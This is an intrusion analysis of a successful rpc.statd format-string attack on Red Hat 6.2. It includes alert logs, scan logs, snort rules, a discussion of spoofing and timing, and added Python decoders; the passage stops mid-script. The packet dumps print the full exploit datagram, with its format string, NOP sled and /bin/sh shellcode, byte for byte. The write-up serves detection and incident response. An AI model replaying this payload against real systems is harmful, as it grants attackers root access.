Analysis performed by Wes Bateman of the Manisec Corporation (http://www.manisec.com)

Detect 2: Successful compromise of rpc.statd on a default RedHat 6.2 installation

Mar 5 04:25:47 MV/IDS10/portmap-request-rstatd: 148.243.136.7:837 -> test.network.70.133:111
Mar 5 04:25:47 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:25:49 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:25:51 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:34:13 MISC - MISC - id check returned root: test.network.70.133:39168 -> 148.243.136.7:3909

Detect 2 - Packet Dumps

03/05-04:25:47.266244 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x62
148.243.136.7:837 -> test.network.70.133:111 UDP TTL:56 TOS:0x0 ID:22522 IpLen:20 DgmLen:84
Len: 64
71 2C 9F A5 00 00 00 00 00 00 00 02 00 01 86 A0  q,..............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 11 00 00 00 00                          ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/05-04:25:47.361124 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x45E
148.243.136.7:838 -> test.network.70.133:610 UDP TTL:56 TOS:0x0 ID:22523 IpLen:20 DgmLen:1104
Len: 1084
7A C8 14 62 00 00 00 00 00 00 00 02 00 01 86 B8  z..b............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3A A3 6A 31 00 00 00 09 6C 6F 63 61 6C 68 6F 73  :.j1....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF  ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31  x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78  37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90  %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/05-04:25:49.368302 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x45E
148.243.136.7:838 -> test.network.70.133:610 UDP TTL:56 TOS:0x0 ID:23053 IpLen:20 DgmLen:1104
Len: 1084
[1076-byte UDP payload, byte for byte identical to that of the 04:25:47.361124 packet above]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/05-04:25:51.375070 0:3:A0:D3:FC:38 -> 0:3:E3:61:29:50 type:0x800 len:0x45E
148.243.136.7:838 -> test.network.70.133:610 UDP TTL:56 TOS:0x0 ID:23508 IpLen:20 DgmLen:1104
Len: 1084
[1076-byte UDP payload, byte for byte identical to that of the 04:25:47.361124 packet above]
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/05-04:34:13.947820 0:3:E3:61:29:50 -> 0:30:71:2C:8:0 type:0x800 len:0xB0
test.network.70.133:39168 -> 148.243.136.7:3909 TCP TTL:63 TOS:0x0 ID:3651 IpLen:20 DgmLen:162 DF
***AP*** Seq: 0xC81E7E72  Ack: 0xC172737E  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 50002261 177275836
75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D  uid=0(root) gid=
30 28 72 6F 6F 74 29 0A 62 69 6E 0A 62 6F 6F 74  0(root).bin.boot
0A 64 65 76 0A 65 74 63 0A 68 6F 6D 65 0A 6C 69  .dev.etc.home.li
62 0A 6C 6F 73 74 2B 66 6F 75 6E 64 0A 6D 69 73  b.lost+found.mis
63 0A 6D 6E 74 0A 6F 70 74 0A 70 72 6F 63 0A 72  c.mnt.opt.proc.r
6F 6F 74 0A 73 62 69 6E 0A 74 66 74 70 62 6F 6F  oot.sbin.tftpboo
74 0A 74 6D 70 0A 75 73 72 0A 76 61 72 0A        t.tmp.usr.var.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Detect 2 - Scans from this attacking host (148.243.136.7)

Mar 5 04:25:47 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS10/portmap-request-rstatd: 148.243.136.7:837 -> test.network.70.133:111
Mar 5 04:25:47 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:25:49 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:25:51 src@dfw1a-core/10.24.0.123 snort[27872]: MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:34:13 src@dfw1a-core/10.24.0.123 snort[27872]: MISC - MISC - id check returned root: test.network.70.133:39168 -> 148.243.136.7:3909
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3168 -> mexicocity.network.32.5:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3170 -> mexicocity.network.32.7:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3169 -> mexicocity.network.32.6:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3171 -> mexicocity.network.32.8:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3174 -> mexicocity.network.32.11:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3186 -> mexicocity.network.32.23:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3187 -> mexicocity.network.32.24:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3188 -> mexicocity.network.32.25:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3189 -> mexicocity.network.32.26:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3190 -> mexicocity.network.32.27:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3191 -> mexicocity.network.32.28:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3192 -> mexicocity.network.32.29:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3195 -> mexicocity.network.32.32:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3195 -> mexicocity.network.32.32:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3196 -> mexicocity.network.32.33:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3199 -> mexicocity.network.32.36:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3201 -> mexicocity.network.32.38:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3202 -> mexicocity.network.32.39:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3203 -> mexicocity.network.32.40:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3208 -> mexicocity.network.32.45:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3209 -> mexicocity.network.32.46:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3217 -> mexicocity.network.32.54:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3219 -> mexicocity.network.32.56:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3221 -> mexicocity.network.32.58:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3226 -> mexicocity.network.32.63:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3227 -> mexicocity.network.32.64:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3228 -> mexicocity.network.32.65:111
Mar 5 08:09:41 ALID/111 TCP portmap Scan detected: 148.243.136.7:3417 -> mexicocity.network.32.254:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4454 -> mexicocity.network.32.5:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4456 -> mexicocity.network.32.7:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4455 -> mexicocity.network.32.6:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4457 -> mexicocity.network.32.8:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4460 -> mexicocity.network.32.11:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4473 -> mexicocity.network.32.24:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4478 -> mexicocity.network.32.29:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4489 -> mexicocity.network.32.40:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4494 -> mexicocity.network.32.45:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4495 -> mexicocity.network.32.46:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4504 -> mexicocity.network.32.54:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4506 -> mexicocity.network.32.56:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4508 -> mexicocity.network.32.58:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4513 -> mexicocity.network.32.63:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4514 -> mexicocity.network.32.64:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4515 -> mexicocity.network.32.65:111
Mar 6 00:54:43 ALID/111 TCP portmap Scan detected: 148.243.136.7:4799 -> mexicocity.network.32.254:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4460 -> mexicocity.network.32.11:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4475 -> mexicocity.network.32.26:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4476 -> mexicocity.network.32.27:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4477 -> mexicocity.network.32.28:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4482 -> mexicocity.network.32.33:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4472 -> mexicocity.network.32.23:111
Mar 6 00:54:52 ALID/111 TCP portmap Scan detected: 148.243.136.7:4474 -> mexicocity.network.32.25:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2320 -> tokyo.network.105.5:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2322 -> tokyo.network.105.7:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2326 -> tokyo.network.105.11:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2323 -> tokyo.network.105.8:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2358 -> tokyo.network.105.39:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2321 -> tokyo.network.105.6:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2346 -> tokyo.network.105.27:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2353 -> tokyo.network.105.34:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2347 -> tokyo.network.105.28:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2349 -> tokyo.network.105.30:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2375 -> tokyo.network.105.56:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2341 -> tokyo.network.105.23:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2344 -> tokyo.network.105.25:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2343 -> tokyo.network.105.24:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2348 -> tokyo.network.105.29:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2345 -> tokyo.network.105.26:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2383 -> tokyo.network.105.64:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2373 -> tokyo.network.105.54:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2377 -> tokyo.network.105.58:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2382 -> tokyo.network.105.63:111
Mar 7 00:22:28 ALID/111 TCP portmap Scan detected: 148.243.136.7:2384 -> tokyo.network.105.65:111
Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1559 -> tokyo.network2.242.134:111
Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1575 -> tokyo.network2.242.150:111
Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1564 -> tokyo.network2.242.139:111
Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1570 -> tokyo.network2.242.145:111
Mar 11 22:17:26 ALID/111 TCP portmap Scan detected: 148.243.136.7:1586 -> tokyo.network2.242.161:111
Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:2969 -> tokyo.network2.242.147:111
Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:3003 -> tokyo.network2.242.181:111
Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:3064 -> tokyo.network2.242.242:111
Mar 12 05:46:25 ALID/111 TCP portmap Scan detected: 148.243.136.7:2960 -> tokyo.network2.242.138:111

#######################################################################

### Detect was generated by:

Linux sensor running Snort 1.6.3 with a combination of whitehats, snort.org, and customized rulesets. The rules that were triggered:

alert UDP $EXTERNAL any -> $INTERNAL 111 (msg: "MV/IDS10/portmap-request-rstatd"; content: "|01 86 A0 00 00|";)
alert UDP $EXTERNAL any -> $INTERNAL any (msg: "MV/IDS362/shellcode-x86-nops-udp"; content: "|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|";)
alert tcp any any -> any any (msg:"MISC - MISC - id check returned root"; content: "uid=0(root)";)

### Probability the source address was spoofed:

Very low. While these UDP packets could have been spoofed, it looks very unlikely that they were. First, the portmap request to port 111 would have required a response to inform the attacker that port 610 is where the vulnerable rpc.statd could be found. Further, another clue was seen in the last packet:

03/05-04:34:13.947820 0:3:E3:61:29:50 -> 0:30:71:2C:8:0 type:0x800 len:0xB0
test.network.70.133:39168 -> 148.243.136.7:3909 TCP TTL:63 TOS:0x0 ID:3651 IpLen:20 DgmLen:162 DF
***AP*** Seq: 0xC81E7E72  Ack: 0xC172737E  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 50002261 177275836
75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D  uid=0(root) gid=
30 28 72 6F 6F 74 29 0A 62 69 6E 0A 62 6F 6F 74  0(root).bin.boot
0A 64 65 76 0A 65 74 63 0A 68 6F 6D 65 0A 6C 69  .dev.etc.home.li
62 0A 6C 6F 73 74 2B 66 6F 75 6E 64 0A 6D 69 73  b.lost+found.mis
63 0A 6D 6E 74 0A 6F 70 74 0A 70 72 6F 63 0A 72  c.mnt.opt.proc.r
6F 6F 74 0A 73 62 69 6E 0A 74 66 74 70 62 6F 6F  oot.sbin.tftpboo
74 0A 74 6D 70 0A 75 73 72 0A 76 61 72 0A        t.tmp.usr.var.

This packet is the only one snort captured from the TCP stream that followed. It is an ACK/PUSH, so it stands to reason that a full three-way handshake had already completed before this packet. While an attacker could forge any TCP flags they chose, this packet originated on my network and was a response to stimulus from the attacker.
The RedHat Linux 6.2 installation's stack would have made sequence number prediction quite difficult, further reducing the odds that the source address could have been spoofed. Basically, the source address was not spoofed. While it is entirely possible that the IP address of this attacker is simply another compromised host being controlled by the real hostile party, the IP address shown as the source of the attack is almost certainly where this attack was launched from.

### Description of attack:

This attack appears to have been generated by statdx.c (http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c). According to whitehats (http://www.whitehats.com/info/IDS442), this attack is CVE-2000-0666 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666) and BugTraq #1480 (http://www.securityfocus.com/bid/1480).

I conducted additional forensic work on the compromised host at the time of the incident. This information can be found here: Detect 2 - Forensics Performed On Host

### Attack mechanism:

This attack succeeds by causing the remote rpc.statd daemon to execute code injected by the attacker. Since rpc.statd never drops its root privileges, the attacker's code is executed as root.

From the network intrusion analyst's (or network voyeur's) point of view, this detect consisted of a UDP packet sent to the target host's portmap daemon, in which the attacker asked the target which port its rpc.statd daemon listens on. The next three packets from the attacker, which snort alerted on and captured, were the actual attempts to exploit rpc.statd's vulnerability. The packet dumps show many x86 NOPs (0x90) followed by something that looks alarmingly similar to /bin/sh. The appearance of something resembling /bin/sh should worry a UNIX admin, as something such as cmd.exe should worry a Windows admin.
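To make concrete what the two UDP datagrams above actually ask the victim to do, here is an added decoder (not part of the original analysis) for the ONC RPC call header, the portmap GETPORT arguments and the start of the SM_STAT mon_name argument. The byte strings are copied from the page's dumps (the exploit packet truncated to its first 112 bytes), the program and procedure names come from the RPC and NSM specifications, and the 255-byte hostname ceiling is my own choice of threshold for flagging the oversized argument.

```python
import struct

# Constructed input: the 56-byte UDP payload of the 04:25:47.266244 portmap
# request on this page, copied from the snort hex dump.
PORTMAP_REQUEST = bytes.fromhex(
    "712C9FA5 00000000 00000002 000186A0 00000002 00000003 00000000 00000000"
    "00000000 00000000 000186B8 00000001 00000011 00000000"
)
# Constructed input: the first 112 bytes of the 04:25:47.361124 exploit packet
# (RPC header, AUTH_UNIX credentials, and the start of the mon_name argument).
# The remainder is the NOP sled and shellcode and is not needed to decode the call.
STATD_CALL_PREFIX = bytes.fromhex(
    "7AC81462 00000000 00000002 000186B8 00000001 00000001 00000001 00000020"
    "3AA36A31 00000009 6C6F6361 6C686F73 74000000 00000000 00000000 00000000"
    "00000000 00000000 000003E7 18F7FFBF 18F7FFBF 19F7FFBF 19F7FFBF 1AF7FFBF"
    "1AF7FFBF 1BF7FFBF 1BF7FFBF 25387825"
)
# The content match of the page's portmap rule: program number 100000 (0x0186A0).
PORTMAP_RULE_CONTENT = bytes.fromhex("0186A00000")

PROGRAMS = {100000: "portmapper", 100024: "status (rpc.statd)"}
PROCEDURES = {100000: {0: "NULL", 3: "GETPORT", 4: "DUMP"},
              100024: {0: "NULL", 1: "SM_STAT", 2: "SM_MON", 3: "SM_UNMON"}}
MAX_HOSTNAME = 255  # mon_name is meant to be a hostname; DNS names never exceed 255 bytes


def _u32(buf, off):
    """Read one big-endian XDR unsigned int; fail loudly on a short buffer."""
    if off + 4 > len(buf):
        raise ValueError("truncated at offset %d" % off)
    return struct.unpack_from(">I", buf, off)[0], off + 4


def _opaque(buf, off):
    """XDR variable-length opaque/string: u32 length, data, padded to 4 bytes.
    Returns (declared length, bytes actually present, next offset)."""
    n, off = _u32(buf, off)
    return n, buf[off:off + n], off + ((n + 3) & ~3)


def decode_call(buf):
    """Decode an ONC RPC CALL header (RFC 1831) plus AUTH_UNIX credentials if present."""
    call = {}
    call["xid"], off = _u32(buf, 0)
    msg_type, off = _u32(buf, off)
    if msg_type != 0:
        raise ValueError("not an RPC CALL message")
    for field in ("rpcvers", "prog", "vers", "proc"):
        call[field], off = _u32(buf, off)
    cred_flavor, off = _u32(buf, off)
    _, cred, off = _opaque(buf, off)
    _, off = _u32(buf, off)           # verifier flavor
    _, _, off = _opaque(buf, off)     # verifier body
    if cred_flavor == 1:              # AUTH_UNIX: stamp, machinename, uid, gid, gids
        _, o = _u32(cred, 0)
        _, name, o = _opaque(cred, o)
        call["machine"] = name.decode("ascii", "replace")
        call["uid"], o = _u32(cred, o)
        call["gid"], o = _u32(cred, o)
    call["program"] = PROGRAMS.get(call["prog"], "unknown")
    call["procedure"] = PROCEDURES.get(call["prog"], {}).get(call["proc"], "unknown")
    call["args_off"] = off
    return call


def decode_args(call, buf):
    """Decode the arguments of the two procedures that appear in the dumps above."""
    off = call["args_off"]
    if call["procedure"] == "GETPORT":        # pmap_getport(prog, vers, prot, port)
        prog, off = _u32(buf, off)
        vers, off = _u32(buf, off)
        prot, off = _u32(buf, off)
        return {"target": PROGRAMS.get(prog, prog), "target_vers": vers,
                "proto": {6: "tcp", 17: "udp"}.get(prot, prot)}
    if call["procedure"] == "SM_STAT":        # sm_stat(mon_name string)
        n, data, _ = _opaque(buf, off)
        return {"mon_name_len": n, "mon_name_prefix": data[:40]}
    return {}


def assess(call, args):
    """What a sensor could flag: the mon_name is far too long to be a hostname and
    carries printf conversion characters, which is the statd format-string pattern."""
    findings = []
    if call["procedure"] == "SM_STAT":
        if args["mon_name_len"] > MAX_HOSTNAME:
            findings.append("mon_name length %d exceeds any valid hostname" % args["mon_name_len"])
        if b"%" in args["mon_name_prefix"]:
            findings.append("mon_name contains printf conversion specifiers")
    return findings


def analyze(buf):
    call = decode_call(buf)
    args = decode_args(call, buf)
    return {"call": call, "args": args, "findings": assess(call, args),
            "rule_hit": PORTMAP_RULE_CONTENT in buf}


if __name__ == "__main__":
    for label, pkt in (("portmap request", PORTMAP_REQUEST), ("statd call", STATD_CALL_PREFIX)):
        r = analyze(pkt)
        print(label, r["call"]["program"], r["call"]["procedure"], r["args"], r["findings"])
```

Run on the page's bytes, the first datagram decodes as GETPORT for program 100024 over UDP (which is why the portmap rule's content match fires on it and not on the exploit packet), and the second as an SM_STAT call claiming uid 0 from "localhost" with a 999-byte mon_name that opens with stack addresses and "%8x".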
One might note that the attack seems to have been automated, as the time between the portmapper request and the first exploit packet was just under 1/10th of a second. Also possibly interesting is that the attacker's first probe packet and his/her three attack packets all originated on ports lower than 1024. If the attacking host is running UNIX, then one might assume that the attacker has root privileges on that host, to be able to open low-numbered ports.

Another observation is that the probing packet precedes the first attack packet by 1/10th of a second, while the three attack packets are each separated by two seconds. Then the last packet that snort captured comes in nine minutes later. I would infer that the first four packets were part of the automated attack process. The last packet appears to be the output from the "id" command. Since it came so much later, chronologically, it is possible that it came not as a result of the automated attack but rather from the actual attacker, working on his/her newly owned host.

As for how the actual exploit works, a good technical description of the mechanics already exists on SecurityFocus.com (http://www.securityfocus.com/bid/1480):

Further information can be gleaned from the statdx.c source code, written by ron1n:

### Correlations:

This attacking IP address had never been observed connecting to any host across any of our networks before. This first contact seems to indicate that the attacker had some prior knowledge of our network. Since this target host's life on the internet was rather short, it is likely that this information was gleaned from a portmap scan which originated from another remote host (controlled by the same adversary) and which would have occurred chronologically close to this event. Unfortunately, any such data is no longer available, making this interesting and potentially valuable correlation opportunity impossible.

### Evidence of active targeting:

This attack did seem to come out of nowhere.
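As an added example (not from the original detect), the script below rebuilds the timing and source-port observations made under "Attack mechanism" from the five alert lines at the top of the page and folds the three rule hits into a single attacker/victim incident. The year 2001 is assumed because syslog timestamps carry none, and the stage names are my own labels for the page's three rules.

```python
import re
from datetime import datetime

# Constructed input: the five snort alert lines from the top of this page.
ALERTS = """\
Mar 5 04:25:47 MV/IDS10/portmap-request-rstatd: 148.243.136.7:837 -> test.network.70.133:111
Mar 5 04:25:47 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:25:49 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:25:51 MV/IDS362/shellcode-x86-nops-udp: 148.243.136.7:838 -> test.network.70.133:610
Mar 5 04:34:13 MISC - MISC - id check returned root: test.network.70.133:39168 -> 148.243.136.7:3909
"""

# syslog-style timestamps carry no year; 2001 is assumed from the whois dates on the page.
ASSUMED_YEAR = 2001

ALERT_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) +(?P<time>\d\d:\d\d:\d\d) +"
    r"(?P<msg>.+?): (?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)$"
)

# The three rule hits on the page, in the order a successful statd attack produces them.
STAGES = (
    ("recon", "portmap-request"),           # GETPORT: where does rpc.statd listen?
    ("exploit", "shellcode-x86-nops"),      # NOP sled in a UDP datagram to that port
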